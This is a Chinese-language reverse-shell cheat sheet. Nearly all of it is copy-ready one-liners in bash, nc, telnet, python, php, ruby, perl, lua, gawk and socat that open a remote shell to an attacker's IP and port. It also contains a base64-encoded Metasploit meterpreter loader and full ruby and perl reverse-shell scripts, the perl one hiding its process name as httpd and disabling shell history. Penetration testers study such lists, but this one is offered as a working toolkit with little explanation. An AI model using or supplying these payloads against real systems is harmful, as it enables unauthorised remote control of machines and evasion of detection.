反弹shell的各种姿势
bash
# 法一:
bash -i >& /dev/tcp/ip/port 0>&1
# 法二:
/bin/bash -i > /dev/tcp/ip/port 0<&1 2>&1
exec
# 法一:
exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done
# 法二:
exec 2>&0 0<&196;exec 196<>/dev/tcp/ip/port; sh <&196 >&196 2>&196
nc(NetCat)
# 需要检查靶机是否安装nc
# 法一: 不同版本的nc不一定支持-e选项
nc -e /bin/bash ip port
# 法二:
/bin/sh | nc ip port
# 法三:
mknod backpipe p && nc ip port 0<backpipe | /bin/bash 1>backpipe
# 法四:
nc ip 输入port | /bin/bash | nc ip 输出port
# 法五:
rm -f /tmp/p; mknod /tmp/p p && nc ip port 0/tmp/
# 法六:当nc版本问题时
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f
telnet
# 法一:同nc法二
telnet ip 输入port | /bin/bash | telnet ip 输出port
# 法二:
rm -f /tmp/p; mknod /tmp/p p && telnet ip port 0/tmp/p
# 法三:nc不可用或者/dev/tcp不可用时
mknod backpipe p && telnet ip port 0<backpipe | /bin/bash 1>backpipe
python
# 法一:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
# 法二:
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('ip',port))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
# 法三:Metasploit + python
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=ip LPORT=port
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
php
# 法一:
php -r 'exec("/bin/bash -i >& /dev/tcp/ip/port");'
# 法二:
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
ruby
# 法一:不常用
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# 法二:不依赖/bin/sh
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# 法三:适用windows
ruby -rsocket -e 'c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# 法四:完整ruby反弹shell脚本(MSF模块自带)
#!/usr/bin/env ruby
require 'socket'
require 'open3'
#Set the Remote Host IP
RHOST = "192.168.1.10"
#Set the Remote Host Port
PORT = "6667"
#Tries to connect every 20 sec until it connects.
begin
sock = TCPSocket.new "#{RHOST}", "#{PORT}"
sock.puts "We are connected!"
rescue
sleep 20
retry
end
#Runs the commands you type and sends you back the stdout and stderr.
begin
while line = sock.gets
Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
IO.copy_stream(stdout_and_stderr, sock)
end
end
rescue
retry
end
perl
# 法一:
perl -e 'use Socket;$i="192.168.32.135";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# 法二:不依赖 /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# 法三:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# 法四:完整perl反弹shell脚本
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";
# Where to send the reverse shell. Change these.
my $ip = '127.0.0.1';
my $port = 1234;
# Options
my $daemon = 1;
my $auth = 0; # 0 means authentication is disabled and any
# source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);
# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";
# Change the process name to be less conspicious
$0 = "[httpd]";
# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
if ($auth) {
unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
cgiprint("ERROR: Your client isn't authorised to view this page");
cgiexit();
}
}
} elsif ($auth) {
cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
cgiexit(0);
}
# Background and dissociate from parent process if required
if ($daemon) {
my $pid = fork();
if ($pid) {
cgiexit(0); # parent exits
}
setsid();
chdir('/');
umask(0);
}
# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
cgiprint("Sent reverse shell to $ip:$port");
cgiprintpage();
} else {
cgiprint("Couldn't open reverse shell to $ip:$port: $!");
cgiexit();
}
# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));
# Wrapper around print
sub cgiprint {
my $line = shift;
$line .= "<p>\n";
$global_page .= $line;
}
# Wrapper around exit
sub cgiexit {
cgiprintpage();
exit 0; # 0 to ensure we don't give a 500 response.
}
# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}
lua
# 法一:
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i <&3 >&3 2>&3');"
# 法二:
lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('ip',port);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"
Xterm(未验证)
首先开启Xserver: # TCP 6001
Xnest :1 # Note: The command starts with uppercase X
授予目标机连回来的权限:
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
如果想让任何人都连上:
xhost + # Run this INSIDE the spawned xterm on the open X Server
假设xterm已安装,连回你的Xserver:
xterm -display attackerip:1
或者:
$ DISPLAY=attackerip:0 xterm
gawk(未验证)
#!/usr/bin/gawk -f
BEGIN {
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
socat(未验证)
tcp
接收端输入:
./socat TCP-LISTEN:ip -
发送端输入:
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip:port
udp
socat udp-connect:攻击者ip:端口 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &
MSF
1.msconsole 管理生成的exp 管理反弹的shell 通过反弹的shell进行后渗透。。。。
2.msfvenom 制作木马
3.msfencode 对木马进行编码
4.Auxiliary 辅助模块
5.meterpreter 连接
从原生的 shell 环境切换到 linux 的交互式 bash 环境
python -c 'import pty; pty.spawn("/bin/bash")'